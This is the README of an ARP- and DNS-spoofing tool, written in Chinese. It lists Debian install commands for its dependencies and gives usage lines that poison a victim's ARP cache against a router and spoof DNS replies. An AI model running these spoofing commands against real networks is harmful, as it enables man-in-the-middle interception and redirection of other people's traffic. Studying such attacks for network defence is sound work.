安装(基于 Debian 的 Linux 发行版)
% sudo apt-get install tcpdump graphviz imagemagick python-gnuplot python-crypto python-pyx
% pip install scapy
% sudo apt-get install build-essential python-dev libnetfilter-queue-dev
% git clone https://github.com/fqrouter/python-netfilterqueue.git
% cd python-netfilterqueue
% python setup.py install
...然后克隆这个仓库!
% git clone https://github.com/devleoper/arp-dns-spoof.git
用法
ARP 欺骗
% sudo python arp_poison.py -v <victim IP Address> -r <router IP Address>
DNS 欺骗
% sudo python dns_packet_spoof.py
参考